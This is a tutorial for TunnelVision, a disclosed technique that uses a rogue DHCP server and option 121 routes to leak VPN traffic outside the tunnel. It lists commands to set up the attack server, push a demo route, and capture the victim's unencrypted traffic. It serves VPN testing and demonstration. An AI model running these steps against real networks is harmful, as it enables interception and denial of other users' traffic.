TunnelVision VPN Vulnerability Tutorial

TunnelVision is a local network VPN leaking technique that allows an attacker to read, drop, and sometimes modify VPN traffic from a targets on the local network, made by Leviathan Security. This technique does not activate kill-switches and does not have a full fix for every major operating system. This tutorial will guide you through the installation, configuration, and usage of TunnelVision to identify potential security issues in your VPN setup.

Installation

TunnelVision is a Bash-based tool and can be installed using git. Ensure you have git installed on your system.

Steps to Install TunnelVision

1. Clone the Repository:

   git clone https://github.com/leviathansecurity/TunnelVision.git
   cd TunnelVision

   Copy

Setting it up

Once installed, you can start using TunnelVision to test your VPN for vulnerabilities.

1. Basic Command:

   sudo ./configdhcpserver.sh
   sudo ./startup.sh

   Copy

2. Utility Commands:

   • cat /etc/dhcp/dhcpd.conf - Shows the current configuration
   • sudo ~/TunnelVision/pushrouteconfig.sh - Pushes a DHCP option 121 route for 8.8.8.8/32
   • sudo ~/TunnelVision/norouteconfig.sh - Allows you to switch back to pushing no routes for testing purposes
   • sudo systemctl status isc-dhcp-server - Shows current status of the DHCP server
   • sudo systemctl restart isc-dhcp-server - Restarts the DHCP server, mandatory if you manually edit the config file
   • sudo systemctl start isc-dhcp-server - Starts the DHCP server
   • sudo systemctl stop isc-dhcp-server - Stops the DHCP server
   • sudo journalctl -u isc-dhcp-server.service | tail -n 50 - Shows the last 50 log lines from the service
   • watch "journalctl -u isc-dhcp-server.service | tail -n 50" - Shows the last 50 logs, and also refreshes every 2s by default
   • sudo tcpdump -i enp0s8 - Shows the traffic on the internal network interface, you can use tcpdump filters such as "icmp" to filter to relevant traffic

Using it

After you've configured all of the things, you can start using it!

1. The target machine has to obtain a DHCP lease from the attack server.
2. The user installs a VPN on the user machine & connects to it.
3. On the attack DHCP server, push the demo DHCP 121 route (8.8.8.8/32): sudo ./pushrouteconfig.sh
4. On the victim machine, show the route table and observe there is a route for 8.8.8.8 that goes over a non-VPN interface:
   • Debian command: ip route
   • Windows command: route print
5. Ping 8.8.8.8 from the victim machine. ping 8.8.8.8
6. Observe that it will either ping or will be dropped.
7. (Optional) Install Wireshark or tcpdump to the victim host and manually confirm the interface the ICMP traffic is using.
   • If ping is not working, observe it goes over NO interface which is the selective denial-of-service behavior
   • If ping is working, observe it is NOT going over the VPN tunnel
8. On the attacker DHCP server, observe you can read the unencrypted traffic. sudo tcpdump -i eth0 icmp (eth0 should be the interface name you are serving DHCP over)